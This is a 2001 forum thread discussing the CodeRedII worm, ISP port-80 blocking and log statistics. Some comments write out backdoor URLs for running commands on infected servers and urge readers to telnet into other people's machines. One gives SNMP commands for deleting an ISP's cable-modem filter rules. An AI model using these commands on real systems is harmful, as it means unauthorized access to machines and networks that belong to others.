Here's the deal. CodeRedII is out there, infecting anything that looks or smells like Windows 2000, running IIS 5.0 and Index Services. Happily, the worm writers are discovering that this pretty much covers the default installation of Win2K Server. Out of the box, it's happy to index the hard drive, and serve up web pages. Nice. This applies to any Win2K Server that hasn't been patched, or for which the owner hasn't shut down IIS or IDS, or both.

CodeRedII does a couple of things -- first it intrudes on the box, overflowing a buffer and executing code. This code modifies explorer.exe and copies it around to make it a little easier to execute. Then, with the worm residing in memory, it seeks out other machines to infect -- viola, YOUR IP address gets hammered.

But what about that modified explorer.exe? When the administrator logs in and runs explorer.exe, the modified version launches a telnet session. There's your backdoor. The infected server now has a telnet service running, with administrator permissions. All the hacker has to do is telnet to the box, and he/she owns it.

So what can we do about it? I say we review our logs, see who's trying to infect us, telnet into the offending box and put a stop to it. You'll know by the three consecutive hits to your IP address, on port 80, from the infected server. Now, knowing the IP address, and surmising from these three hits that they're out looking for another box to infect, *WE* log on using the unprotected telnet session and issue the BORG sleep command. Sleeeeep. Sleeeeeeeeeeep. Or, in Microsoft parlance, SHUTDOWN.

Who's with me? Gonna take some smarts to check syslogs and cable modem router logs to see who's been knocking, then telnet into the boxes to say 'shutdown'. Perhaps we can also write a little batch file to pop a message to the system operator, inviting them to PATCH their damned server.

Cutting off port 80?

[Heem]

I know of at least one broadband provider that is completely shutting off access to machines known to be infected.. and not allowing them back on untill they patch up. (well i imagine they must let them on to at least downlaod the patch). If @home blocks my port 80 i'll be quite pissed. Yes I'm lame, I'm running IIS (patched) on my cable modem.

Re:Cutting off port 80?

[interiot]

You can block incoming and outgoing http connections separately. eg. if a SYN packet is going from an outside address to an inside address, and the port number is 80, block it. But don't block anything else.

Re:Cutting off port 80?

[Atzanteol]

I *am* pissed! I'm running Apache on mediaone's (read: att) network and can't get to my site...

Funny how I had to read slashdot to find out though. I got no notice from att, and can't find a thing about it on any of their sites.

Re:Cutting off port 80?

[bacchusrx]

I'm not sure of the extent of AT&T's actions, but, they've probably blocked all incoming connections on port 80. This wouldn't prevent connections *to* port 80, of course, since web content itself is returned to the client on an ephemeral port...

I've been afraid broadband providers would move to do this anyways... since in most cases the ISP explicitly forbids server activity on end-user systems. Rogers@Home, in my area, sets their cablemodems to "sleep" after some predetermined interval-- this prevents any incoming connections unless the modem is awakened by outgoing traffic. Of course, putting "ping > /dev/null &" where into your rc.local makes short work of that ;)

BRx.

Re:Cutting off port 80?

[aoeuid]

Uh, you can cut off a port in one direction only you know......

Re:Cutting Off Port 80?

[Bonkers54]

I just got off the phone with the MediaOne tech-support and the person I spoke with said that "My supervisor told me that there is no way to unblock port 80 on your account" and she went on to tell me that until the virus has been stopped, it will not be unblocked. I think they should just block people's accounts completly that are infected and too dumb to patch their webserver, and if they'd like I could give them a list of every infected user generated nicely by my Apache logs. I don't see why they should have to block port 80 at all because the contract states that servers are not allowed, but I'm not complaining about them being loose on that.

Re:Cutting off port 80?

What, do you think they plan to ever turn port 80 back on? Trustworthy one, aren't ya?

Re:Cutting off port 80?

But what about people's machines on _their_ network that are infecting other people?

Re:Cutting off port 80?

you're not the only one. Verizon cut off port 80 last night and didn't tell any of their customers. They did at least make a note of it on their 'network status' page, but no proactive notification.

Re:Cutting off port 80?

[dodald]

God I hope they don't do that here (RoadRunner Binghamton). I'm running Apache (1.3.17) and I have awstats running. I've gotten 1926 (as of 7:10 EDT) from the virus. If I had to run a MS operating system as a webserver I would trust apache more then IIS.

Re:Cutting Off Port 80?

[pbur]

Running a webserver or a server of any sort is against the policy rules of MediaOne, or did you forget that? I have the service and remember specifically reading that in my agreement.

Re:Cutting Off Port 80?

Try connecting to your modem through SNMP, and unblocking it yourself (assuming it's blocked at the modems - it might be blocked using some other method). "ping -b 255.255.255.255" can often be used to find your modem's IP address, which should be in the 10.x.x.x block (you should get 2 replies, one from your modem, one from your router/CMTS).

If your modem's community strings have not been modified, you can use "snmpwalk 10.x.x.x public ." to view the modem settings. "docsDev.docsDevMIBObjects.docsDevFilter" controls the filtering. Using "snmpset 10.x.x.x private docsDev.docsDevMIBObjects.docsDevFilter.docsDevFil terIpTable.docsDevFilterIpEntry.docsDevFilterIpSta tus.1 i 6" should delete the first firewall rule. Using "...Status.2" will delete the second, etc.

Some ISP's change the community strings from the defaults of public/private, or restrict access to certain IP addresses, making this much harder. You may be able to reset the defaults by using the modem's reset button (power cycling is not enough, and this only works on older modems - newer modems set the community strings through the modem config file, before you have an opportunity to access anything), but unless you know enough about SNMP to lock your ISP out of the modem, they'll probably restore the settings within a few hours.

Re:Cutting Off Port 80?

What's the raw OID for "docsDev.docsDevMIBObjects.docsDevFilter.docsDevFi l terIpTable.docsDevFilterIpEntry.docsDevFilterIpSta tus.1 "? I don't have MIBS.

Re:Cutting off port 80?

[imevil]

Yeah, I was running apache on port 80 too, and so suddently I couldn'connect to the webpages from outside... Since I the server is connected with Verizon I thought that it was some new sucky feature of this provider. I moved to port 8080. Thanks to /. I discovered that there was a good reason for that.

I am wondering if the cable companies usually allow to put a server up.

The company I am using now used to forbit it, and it used to have quotas too.

E

Re:Cutting off port 80?

[niccodicco]

AT&T's residential broadband division (MediaOne) has cut off port 80 across their network to try and halt the spread of the worm

I don't really see how this will help either. If you're running an unpatched IIS connected to the net, you'd been scanned and rooted a couple of thousand times by now. If you look at the graphs on incidents.org, you'll see the worm isn't really spreading any more. It's just flooding.

Re:Cutting off port 80?

[Kenyaman]

MediaOne allows you to run servers? When I was trying to decide between cable and DSL, that was a deciding factor: Comcast@Home made an enormous deal about not running ANY servers on their network. Seems that, among other things, cable networks aren't all that great at returning data back upstream.

Re:Cutting Off Port 80?

[Sc00ter]

NO, it's NOT against their policy.. perhaps you should read it first..

Re:Cutting Off Port 80?

[treke]

My agreement stated it was unsupported, but not against the rules. This was also cleared up by contacting Mediaone(You just can't run any off of a undistributable list of prohibited servers)

Re:Cutting off port 80?

It's posts like this that makes me wish there was a -1, Stupid moderation.

Medium damage

[EndlessMe]

Meaby that's becouse Symantec threat Microsoft software as non-popular and that's why this is not very dangerous :)))

Re:Medium damage

[Tackhead]

> > I don't understand why Symantec classifies a "remote root" exploit as only "medium" damage.

Well, given the choice between having j00r box r00ted and having something like WinCIH blank out your BIOS and wipe out your FAT...

For security, it's critical. But the amount of data loss is minimal until after someone telnets to the open port and blows away your drive.

Finally, consider Symantec's core market -- not the guy running a brokerage firm on a farm of IIS boxen, but home and office users of PCs worried about the virus that'll wipe out their pr0n collection. Joe Win95er really isn't at risk from Code Red II, apart from wondering why "the Internet is slow" if he's on RoadRunner.

Considering Symantec's core audience, and what this worm could be doing to compromised systems, and yeah, I'll buy "medium".

Re:Medium damage

[blang]

nope. I think it's because everybody's got it, so the likelyhood that anybody will bother doing anyting really nasty to any given machine is small. We now have a millions of machines excercising security by obscurity. I wish I just don't hope all the IIS machines now gang up on the rest of the net.

I'd just hope they'll have more imagination with their hacks. "Hacked by chinese" WTF? Spending all that time devising a crufty virus, and that's all they have to say? What a complete waist of human effort. Blackhats wearing diapers?

Gasp....

[JoeLinux]

You mean Windows isn't secure? Network specialists are being PAID to figure this out? I wonder what happens if a consortium sits down and decides how to make the perfect virus...a friend of mine suggested that having it recompile itself on the system it hit, and contact the last instance of it to recieve updates. Just a thought...

JoeLinux

Re:Gasp....

[eh2o]

My god... thats a scary thought... a worm which can mutate its own binary? It could be a hard thing to squash with simple detection methods.

Its all too easy to think of evil viruses which can be written... maybe that is why it keeps happening.. because its just too easy not to try it. ;)

Its kinda like the brass in the Pentagon talking about some new bio-weapons they made... danger schmanger joe, it was so easy to make this virus, we gotta try it out!

Re:Gasp....

Most windows computers don't have compilers installed on them, so the approach would be best on bloated linux distros. Seriously, the only way CodeRed will go away is if someone writes a 'PatchRed' worm that infects every possible IIS server, then after a period of time downloads the hotfix, applies it and resets the server. The whole thing could be gone in 24 hours, the FBI and Microsoft would have to get a court order to do it (under the legal premise that allows fire fighters to trespass). Brian

Intranet Code Red

I work for a certain, um, large company that makes microprocessors and the Code Red has hit us particularly hard internally. We've had to take down a lot of the port 80 intranet applications and the packet storms are playing havock with our email. It's driving everyone nuts!

Ease of Attack

[aoeuid]

I did a little experimenting myself, and I absolutely cannot believe the ease at which you can get into these systems and download any file you wish (root.exe?/C+copy+file.txt+c:\inetpub\wwwroot). How this is not all over the media, considering the sheer number of infected hosts is beyond me.

Re:Ease of Attack

[Sawbones]

Myself I might be tempted to do

root.exe?/C+echo+Do+it+>+C:\Documents+and+Settings \ All+Users\Desktop\PATCH+YOUR+IIS.txt

perhaps with a little more explaination than "Do IT".

Re:Ease of Attack

I just tried GET /scripts/root.exe HTTP/1.0 on a few IPs listed in /var/log/httpd/access_log, and they all returned a copy of root.exe, not a shell prompt. No dice.

Re:Ease of Attack

I'd say the server's MIME is screwed if you're getting that.

increasing number of scans

[kajoob]

I'm running blackice defender (i know, i know, real men run firewalls at the network layer) however I'm up to about 8-9 scans or my port80 every hour and it seems to be increasing.

Network traffic seems high - is this why?

[Jerf]

I'm on an @home cable network, and for the last couple of days my little activity light has been blinking at an astonishingly high rate. Today I finally sniffed the network to see what it was, and it's an amazing rash of ARP requests... about 20 per second. Normal seems to be more like .5-1 per second. (The cable modem of course only allows me to see broadcast traffic and traffic meant for my network, and I don't normally see this much traffic.) Think this new Code Red is the reason why? Makes sense...

Re:Network traffic seems high - is this why?

Yes -- it is Code Red. The arp requests are coming from your default gateway looking for the MAC addresses of the hosts that are being scanned.

Re:Network traffic seems high - is this why?

[Aaaaaargh!]

I'm on an @home cable network, and for the last couple of days my little activity light has been blinking at an astonishingly high rate.

No, it isn't. At least according to the helpdesk drones. Level 2 support tries the old, "These are not the IPs you are looking for..." Jedi mindtrick.

It certainly looks like the Code Red activity is to blame for the storm of ARP packets. Makes stealing @Home IPs rather easy right now, seeing as how ARP requests for identical IPs roll in about 1-2 times per minute. If only there were an example of an ARP exploit that could be tweaked to feed my paranoia...

Re:Network traffic seems high - is this why?

[VP]

Yes - check the athome.* newsgroups for more details...

Basically the new, "improved", Code Red is scanning close-by IP addresses, thus trying to find machines that may not even exist, or which are turned off at the moment. In this case, the @home gateway sends an ARP broadcast packet trying to find the IP address in question. This broadcast traffic causes the "activity" light to blink constantly... In my area, there is no performance degradation, though (yet).

Re:Network traffic seems high - is this why?

[VP]

No, it isn't. At least according to the helpdesk drones. Level 2 support tries the old, "These are not the IPs you are looking for..." Jedi mindtrick.

Slightly better here (Charter@Home):
Saturday - "this is normal"
Sunday - "We know we have a problem and we are working on it."

Since there is no performance degradation (yet) I haven't even gone to level 2 support...

Re:Network traffic seems high - is this why?

I also have an AT&T Cable modem, running Zone Alarm on my Win98 box. Previousely, I would get around 15-20 alerts a day, with ZA blocking various traffic on a variety of ports. The past few days, I am getting an alert about every 90 seconds, with nearly all traffic on port 80.

this thing is fascinating

[BitchAss]

I gotta say this worm is really amazing. You can watch it's growth in your log files. Mine roll over daily and you can see the file sizes increase day by day. On Aug 1 I had an 8k log file. The 2nd I had a 12k one. The third was 32k the day after that was 64k. Today it was up to 192k so far and there's still another 2 hours till the log file rolls over.

Re:this thing is fascinating

[garcia]

I am noticing quite a bit of hits coming w/in 1-2 minutes of each other from the same IP. They come in three in a row now...

I am apparently lucky as I have yet to see too too much traffic yet I feel it has only begun... :(

Re:this thing is fascinating

[Reality+Master+101]

Here's my hit graph:

Aug 1: 17 hits (to default.ida)
Aug 2: 37 hits
Aug 3: 31 hits
Aug 4: 305 hits (boom!)
Aug 5: 474 hits
Aug 6: 501 hits
Aug 7: 256 hits (so far at 16:00)

At least the trend seems to be a little down today. :)

Re:this thing is fascinating

I'm getting hit harder now than on August 6 or 7.

By 4 p.m., I've had 400+ attacks. I expect it to be 600 by mindnight.

Re:this thing is fascinating

[TheReverend]

Here's mine. I'm on a 24.x.x.x cable modem... Aug 1: 18 hits Aug 2: 0 hits Aug 3: 12 hits Aug 4: 35 hits Aug 5: 259 hits Aug 6: 357 hits Aug 7: 232 hits (as of 19:15)

Re:this thing is fascinating

[bjsvec]

Log files from my small personal web server:

# ls -alrt access_log*
-rw-r--r-- 1 root root 1671 Apr 27 06:42 access_log.4
-rw-r--r-- 1 root root 311987 May 31 17:28 access_log.3
-rw-r--r-- 1 root root 968031 Jul 1 03:27 access_log.2
-rw-r--r-- 1 root root 3015425 Jul 31 12:18 access_log.1
-rw-r--r-- 1 root root 1163259 Aug 7 18:15 access_log

Re:this thing is fascinating

[refactored]

Drool! With a measly total of 270 hits over all logs I think I'm heavily underpowered on the bandwidth side.

Whine! Slobber! Drool!

Re:this thing is fascinating

[Marc+Boucher]

It has been 51 hours since I re-opened outside access to my webserver (apache), to identify the type of attack. They were previously logged in my firewall but are not recognizable except for the port number: 80.
I'm using Kryptolus' script to scan my logs and generate a report. Here is a snapshot of this report. (pages are currently not there, nbci seems to refuse ftp upload. I'll try later)
The count is now at 1123 and still rising. The bulk of the connections is from my ISP's DSL network (in Belgium), but I'm also seeing attempts from outside: Honk Kong, Taiwan or Sweden for example. If these computers are trying each possible IP, think of the number of checks they have made before reaching me! ;)

Re:this thing is fascinating

I've had over 2558 hits since this whole thing started and they've been doubling in amounts each day

Re:this thing is fascinating

[chickenmilkbomb]

This thing is great!
My website has never seen so much traffic!
Now I'm just going to sit back and watch the ad money roll in...

If I wasn't so damn lazy, I would write a php
script or a servlet and alias it to default.ida
to autoupdate my "hit count".

Roadrunner Outage

[cei]

I have AT&T Broadband at home (in Los Angeles) and yes, it seemed like port 80 was being blocked perhaps from Sunday until some point last night. Web browsers stopped functioning but other IP ports remained open.

Didn't see any warnings on their site (connected from elsewhere) yesterday though. You'd think they'd give people warning, and their suport phone number kept me on hold for hours on end...

BIG NEWS:

[AdamInParadise]

The Internet is insecure!

Sysadmin that doesn't apply patches get owned!

Writing virus is as simple as opening Word! (Yes I know Code Red is a bit more complicated, it's written in Delphi)

Come on, this is completly predictable. What really amuse me is the fact that we haven't seen a really dangerous bug yet: something along the lines of Code Red, mixed with CIH (destroy motherboards), that format each hard-drive it encounter. Are virus's writers responsible or what? This would make the Internet a lot more secure, one way or another. And yes, this is a Microsoft worm for God sake's !

Re:BIG NEWS:

[analog_line]

We won't see something that destroys hardware last too long, because destroying hardware doesn't promote the expansion of the virus. Something that slows you down but doesn't kill you outright is far more likely to stick around long enough to get spread. Code Red, Code Red 2, and other "worms" are far more virus-like than most "viruses". Melissa, SirCam, and the like are merely trojans. They require users to interact with them. Code Red, Code Red 2, and the original Internet Worm replicate of their own volition and go out and find other infectable systems so they can repeat the process. Sounds a lot more like a biological virus to me.

Re:BIG NEWS:

[interiot]

AIDS infects others for many years, and then kills its host. Such a strategy is certainly feasible with computer viruses and worms. Some suggest that the only reason they haven't done that yet is that virus writers want the instant gratification of seeing their work on the front page news.

Re:BIG NEWS:

[AdamInParadise]

Well, all viruses are not this kind...

Look at Ebola: it can spread like crazy trough the air and it kills its host in less that a week. In this case, the only solution is contention.

Let's bet: how much time do we have left until we have to create compounds around "infected" portions of the Internet...

Re:BIG NEWS:

[brokenwndw]

IANAV[irologist], but here's my two cents anyway.

According to the CDC, Ebola is spread in the air in the laboratory but not, for practical purposes, in humans (yet). In the Africa outbreaks the disease was spread via contact with infected secretions and fluids.

It's long been held that the best strategy for a virus is to be as benign as possible, so that the host lives on to spread the disease and (in the case of humans) doesn't seek treatment. It's not hard to imagine that computer viruses would evolve similarly (who knows how many sleeping viruses there might be out there?). On the other hand, sometimes you wind up seeing selection for certain damaging traits if those traits help the virus multiply. (In the biological world, for example, viruses spread through the water supply often cause severe diahrrea, which damages the host but improves the chances of infecting more hosts. In the computer world, well, I think Code Red is a fine example...)

Does anyone know of attempts to use biological techniques to analyze or fight computer infections? I seem to remember something about a net-based immune-system like construction but I can't find it.

--------

Re:BIG NEWS:

[TrollMaster5000]

Yes. And more power to the maker of the worm.
Showing sysadmins that they should either

1. Upgrade.

2. Run a better OS...

...One that comes with the code, so they can actually SEE WHAT IS HAPPENING ON THEIR OWN SYSTEMS.

Re:BIG NEWS:

News flash: if it was showing sysadmins _anything_, it'd be gone by now. The reason it's still around is that people are too lazy to patch their damn servers, they'd rather sit around and wait for someone else to take care of the problem.

Re:BIG NEWS:

[well_jung]

I have an immune system. It's called OpenBSD. AKA The Jimmy Hat OS. Ultra Sensitive and ribbed for her pleasure.

netblock

[psychalgia]

we make a lot of home products at our company, you've probably used 5 or 6 or more in a lifetime. Our entire multi-billion dollar operation came to a halt today when our netblock was attacked by the nt4 servers and nt5 clients. I guarantee that none of those clients had the sp2 fix...

In Poland too!

[zdzichu]

Polish Telecom, the biggest ISP down here, also announced that they will block traffic from 'infected' sites. Trying to connect to whitehouse server is taken as a proof of infection.

Re:In Poland too!

[ivan37]

Ahhhh...so this worm was released by the Polish government so that they could punish people if they decided they wanted more information about America!

Re:In Poland too!

[JediTrainer]

Hmm... www.whitehouse.gov seems to have been hacked. It's a porn site!

Kidding, kidding!

Massive arp traffic

[PoochieReds]

I just got home from work and saw the little light on my cable modem going nuts. I did tcpdump from my firewall box and I'm seeing MASSIVE amounts of arp traffic.

Perhaps I'll call roadrunner and see about a refund for the crappy bandwidth I'm getting tonight ;-).

Man, I wish...

[Rimbo]

I wish that RoadRunner San Diego would do that! All they've done so far is to send two "Virus Alert" e-mails out to people, imploring them to install the patch if they run Win2k or WinNT.

I really think that it's the responsibility of a machine's owner to lock down his/her system from attack. Ignorance of the rule is no excuse. If you put a machine on the net, and it's not secure, it becomes a danger for everyone.

The easiest thing to do is to shut down the access to machines that are infected. That way, you have their undivided attention when they call you up and say, "My cable's not working!" You simply respond... "Yes, we shut it off, because you wouldn't take care of business."

You're not lame for running IIS if you've patched it. You're lame if you aren't paying attention to the patches out there.

Re:Man, I wish...

[blang]

You're not lame for running IIS if you've patched it. You're lame if you aren't paying attention to the patches out there.

Sorry for being such a troll, but what makes you believe that this patch is the ultimate cure of IIS security bugs? You may not be lame, but you do posess an impressive threshold for pain.

Re:Man, I wish...

[onepoint]

You and me both. My log file has a total of 6000 + ip address that have hit my modem. Since sunday afternoon.

I did find something strange. 65 IP addresses hit my modem more than 90 times, mostly in a row. Also I have noticed that UDP (port 6970)and port 53 attacks are up.

anybody noticing simular stuff

ONEPOINT

Re:Man, I wish...

"You're not lame for running IIS if you've patched it. You're lame if you aren't paying attention to the patches out there."

A properly configured IIS box with .ida/.idq extentions disabled is immune to the worm. If you are running IIS and have no idea how to remove it from it's horrible out-of-box configuraiton, you are lame.

Re:Man, I wish...

[roystgnr]

Sorry for being such a troll

Well, we all have our off days...

but what makes you believe that this patch is the ultimate cure of IIS security bugs?

What makes you believe that this webserver is the ultimate cause of computer security bugs?

Currently my own computer system is accepting untrusted input through (to name a few) openssh, samba, XFree86, pine, mozilla, and identd. I can recall installing security updates at least once over the past four years for all but the last two programs, and I may have forgotten a security update (or thought of it as a functionality update) for them.
I'm sure you're happily using Apache and Sendmail; check your logs sometime. You see those 90% of users running IE and Outlook? Wanna guess how many of them are patched against the dozen remote root exploits that have been found in those client-side programs?

Running a patched IIS may not be the epitome of anti-lameness, but it's far enough above the median internet shmoe that you might as well be friendly to the guy.

Re:Man, I wish...

Interesting moderation... mod up the replies but leave the original at 1. Morons.

Code Red Self Test

[staplin]

While out and about looking for the latest Code Red statistics, I found this link to a Code Red Self Test which is supposed to tell you if you are vulnerable, and if you have been infected.

I don't know if it works, I don't have a Win boxen to test it on...

Re:Code Red Self Test

That test tends to report false positives.
(better than false negatives, at least)

Re:Code Red Self Test

[Omerna]

According to it I don't have it (and I know I don't) so it either works or is just going to provide everyone who DOES have it with a nice surprise.

Re:Code Red Self Test

[The_Weevil]

Lol.

It isnt difficult to self test. Get your IP with winipcfg then type this in a browser:

http:///scripts/root.exe?/c+dir

if you download a directory listing, you're infected. Ohohoho. Practically all win2k users i know are infected. how amusing.

You may also find /scripts/shell.exe works too.

Weevil.

Re:Code Red Self Test

[The_Weevil]

hmm. and put your IP between all those slashes. /. cut it out. damn j00 /. :)

Re:Code Red Self Test

it reports that both my winME box and my win2K box are infected, I know they aren't so there has got to be something going on with my firewall then...Im going to check this dumb thing from my LinUx boxes across town, we'll see...

Re:Code Red Self Test

[chowpalace]

NOTICE TO W2K users: winipcfg does not work. go to a DOS box and type ipconfig /all fill in your IP addy after http:// e.g. http://255.255.255.0/scripts/root/exe/c+dir If you get a connection refused you are probably good to go

Re:Code Red Self Test

Gotta make it easier for the dumbasses that don't patch their server.

http://127.0.0.1/scripts/root.exe?/c+dir

Re:Code Red Self Test

[psychalgia]

so both my winME machine across town and redhat machine report they are clean, it's gotta be something with my firewall then... anyone got any ideas?

Re:Code Red Self Test

[osgeek]

How about if someone just writes a Code Red version that instead of doing something nefarious just puts up a dialog that says: "Hey, you fucking moron! Patch your crappy IIS server so that you don't get some version of Code Red."

Better yet, why not just run the patch installer for them?

Cutting off port 80?

[yerricde]

AT&T's residential broadband division (MediaOne) has cut off port 80 across their network

Seeing as how HTTP runs on port 80, how are outgoing HTTP connections (i.e. web page pulls) supposed to proceed across the network? Given that frontends to mail, newsgroups, and file transfers are increasingly HTTP-based, they might as well just schedule total network downtime during Code Red attacks.

Cutting off port 80

[Grim+Grepper]

I really hope that RoadRunner doesn't decide to cut off port 80, as I happen to be running a webserver. Since I don't use IIS or Windows, it seems unfair that they would cut me off; it doesn't seem quite fair.

What they should do is scan for people running IIS webservers and cut them off. Leave the Apache users alone!

Re:Cutting off port 80

[interiot]

Can you change the server's port to another port, say 8080? Or do you have quite a few links to the server?

Re:Cutting off port 80

[Twilight1]

Actually, if you check your Acceptable Usage Policy, you will probably find that you are not allowed to run servers on your connection. I have always avoided any ISP that prevented me from fully utilizing my connection.

I just think it's rather amusing to see a bunch of people complaining about a service blocking access to something that they weren't supposed to be doing in the first place. Did you read your AUP and Terms of Service before you signed up? No? Tsk tsk...

-Twi

Re:Cutting off port 80

[gad_zuki!]

Well you are breaking policy, if they didn't want your money you'd probably be kicked off by now. O

Re:Cutting off port 80

Verizon allows for servers for anything you want, with the caveat that they have to be 'low bandwidth'. As long as you say under their (undefined) threshold they don't care. A moot point now tho, since they're ingress filtering port 80.

Re:Cutting off port 80

If you check the at&t roadrunner subscriber agreement, you will see that it only mentions running those services for commercial purposes. As long as you are are no reselling/redirecting traffic, its perfectly legal to run your own servers.

Re:Cutting off port 80

[jfunk]

He said RoadRunner. If it's anything like my RoadRunner setup, he's allowed to run web and FTP servers as long as he notifies them (to open up the ports on the cable modem).

In fact, I just wiped my webserver and I'm doing a major upgrade on it right now.

Re:Cutting off port 80

[bk1e]

I read my AUP and terms of service before signing up. Then Road Runner demonstrated that they are incapable of keeping mail servers up and running, so I started running postfix. This mail server was a gateway to harder servers; pretty soon, I was all strung out on thttpd. It was crazy, man.

I have always avoided any ISP that prevented me from fully utilizing my connection.

Unfortunately, I don't have as many choices as you. The only legitimate option I have is to pay insane prices for "business" 28.8k dialup service, since I can't get IDSL, ADSL, or SDSL. Road Runner is the only broadband service that will connect me.

Anyway, the AUP/TOS haven't been a problem before, since the local RR admins tend not to care about servers unless they are bandwidth hogs.

Re:Cutting off port 80

[Sc00ter]

HEY! It's not against their AUP to run a web server!

From: http://help.broadband.att.com/subagreelease.jsp

(b) FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer.

And the actual AUP page doesn't mention it at all: http://help.broadband.att.com/faq.jsp?content_id=7 2&category_id=34

Re:Cutting off port 80

[iammichael]

I don't use RR, but my mom does. She called me after receiving an email from Road Runner, frantically asking me what she needed to do. She was worried she was spreading this new "virus." They probably would have mentioned that they were planning on shutting down port 80 since they were already sending out a mass email on this topic.

Here's a copy of that customer email:
----- Original Message -----
From: <security@cfl.rr.com>
To: <Our Valued Customers>
Sent: Tuesday, August 07, 2001 9:21 AM
Subject: Security Notification

ROAD RUNNER ALERT

VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED.

Dear Road Runner Subscriber:

Road Runner, like many other ISPs and, indeed, the entire Internet, has experienced an attack on its network that apparently is attributable to a strain of the Code Red virus. It is possible that this virus has infected the PCs of Road Runner customers using the Microsoft Windows NT Server or Microsoft Windows 2000 Server operating systems. Infected PCs may continue to flood the Internet and the Road Runner network with virus-generated messages (even without your being aware of it).

Road Runner is working to alert all of its subscribers to this problem and to instruct them on where to find and install the patch necessary to eliminate the virus. In the meantime, Road Runner customers may experience slow network response, flashing data lights on their cable modems, and other symptoms (such as unusual port scan log activity or increased firewall activity) while Road Runner and the Internet community work to control the impact of this virus.

IF YOUR PC IS RUNNING WINDOWS 2000 SERVER OR WINDOWS NT 4.0 SERVER, PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE (www.microsoft.com/security) AND RESTART YOUR PC.

IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOUR ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART.

We ask for your patience while Road Runner continues to work with the Internet community to address this virus.

Thank you.

Road Runner Security

Re:Cutting off port 80

[Fizzlewhiff]

That's exactly what I did but a day late. AT&T should have at least sent warning to subscribers that this was going to happen. Last week AT&T decides to change my email domain without telling me. This week they block incoming port 80 requests. What will this do for them in the long term? I think what we'll see is the next Code Red flooding ports used to MSN and AOL messenger so the ISP's will block those ports as well.

"Medium" Damage

[turbodog42]

From Symantec's website:

Damage
The damage component measures the amount of harm that a given threat might inflict. This measurement includes triggered events, clogging email servers, deleting or modifying files, releasing confidential information, performance degradation, errors in the virus code, compromising security settings, and ease by which the damage might be fixed.

In terms of what it does locally (ie doesn't erase your entire harddrive), medium damage isn't that far out of line.

Maybe they should add a Mainstream Media Hype rating...

Re:"Medium" Damage

[JoeBuck]

Oh, come on. You say that it doesn't erase your entire harddrive. Rather, it tells the entire net "Hey everyone! I am an infected computer, you can run any command you want on me!".

For example, my web log (and everyone else's web log) has the hostnames or IP addresses of dozens of infected systems. It would be a trivial matter for me (or anyone else) to now erase the hard drives of any of these machines, or just to browse through the entire hard drive and take what I want and trash the rest.

Or even better: use the back door to install a new Trojan that will still be present even after the owner applies Microsoft's patch.

Re:"Medium" Damage

[turbodog42]

True enough, but the sequence of steps you mentioned are doable, but definitely non-trivial. The average script kiddie would have to put out a lot of effort to accomplish all that.

If code red did, automatically, trash your hard drive and rewrite index.html to read "th3 b3st l33t hax0r 0wns j00 - t0m landry m1ddl3 sk00l rulez!!!!", well then that would be high...

Re:"Medium" Damage

I agree that someone could easily do a lot of damage to an infected host. However...

due to the sheer number of backdoors that are now out there, it is likely that the vast majority of them will go unused.

(Also, people who haven't bothered to fix their system by now generally don't have anything very interesting anyway. The most you could get would be some credit card numbers and nudie pix... there's no shortage of either of those on the internet.)

Re:"Medium" Damage

Someone somewhere must be working on a version 3 that systematically causes serious damage to all these vulnerable machines. I give at most 48 hours before someone adds the final touches and release it into the wild. It's human nature. It only takes one guy out of the millions who know how. Those boxes are doomed sooner or later.

It _is_ quite benign.

[Hobbex]

Besides the load of the spread (which is probably made signficantly better by having the worm mostly scanning on it's own subnet) CodeRed2 is quite benign.

Yes, it does open a remote root exploit, but the servers that got infected were already wide open due to the default.ida hole. Sure, it's easier now, but since there are simple exploits for default.ida already, any script-kiddie worth the name could already have walked straight into these computers.

In truth, I figure that the people who have made most use of this exploit has been geeks who would ordinarily never break into systems, but have been made curious about where the worms are coming from (of course, _I_ would never do such a thing... really...)

Re:It _is_ quite benign.

[maunleon]

The problem really is that it opens you up, then it broadcasts it to all your neighbors. Kinda like breaking your door down and putting a "Help Yourself" sign in front of the door.

Worse, much worse

[digitalhermit]

Remember reading in high school biology that getting cowpox would confer a resistance to smallpox? I wished more IIS servers had gotten hit with Code Red I and forced them to patch. On my tiny little site I'm getting over two hundred unique requests for default.ida every half hour. I guess that this is because of my IP address being in the DSL neighborhood.
Lots and lots of the machines I checked have the default IIS page. This may mean that the owners don't know they're running a web server (thanks to default installs) or are home users reading about this new Code Red II and thinking, "Hmm... I'm glad I'm not running a server." I've only seen a small percentage of duplicates too, so the rate of infection is definitely high.

Re:Worse, much worse

I have a high number of duplicates, as many as 15 from some hosts...

Re:Worse, much worse

[digitalhermit]

The dupes are starting to climb, but are still less than 5% of the hits. I took a peek at a few of the addresses that are hitting my site and found that the majority are unconfigured (non scientific testing -- just cutting and pasting IPs).

Someone should update that Everything entry.

[JeffHunt]

I think it's great how there was the link to give the definition of Code Red in the story, but nobody had actually given the contextual definition.

Re:Someone should update that Everything entry.

[Sokie]

http://www.everything2.com/index.pl?node_id=112673 9&lastnode_id=1037487 is where they really want to link that definition to. I think everything moved Code Red Worm to it's own node instead of making it a definition of Code Red.

AT&T Broadband..

..has DEFINITELY shut off inbound port 80 traffic to some (if not all) of their cable modem infrastructure. I am in Massachusetts, and I'm cut off. The roadrunner.* newsgroups are boiling over this, and there's been NO official release from AT&T, although their customer support reps readily admit that 80 is off and will remain off, presumably indefinitely. I am bullshit about this, but have nowhere to go. DSL is collapsing while AT&T is getting bigger. Behold the fruit of two monopolies: AT&T and Microsoft.

Re:AT&T Broadband..

Just put your site on a differnet port if you still want people to access it...

It is only Medium DAMAGE!

[thufir]

I don't understand why Symantec classifies a "remote root" exploit as only "medium" damage.

Maybe because they don't! You are thinking in terms of security hole. With a virus it is different, you are more concerned about data loss.

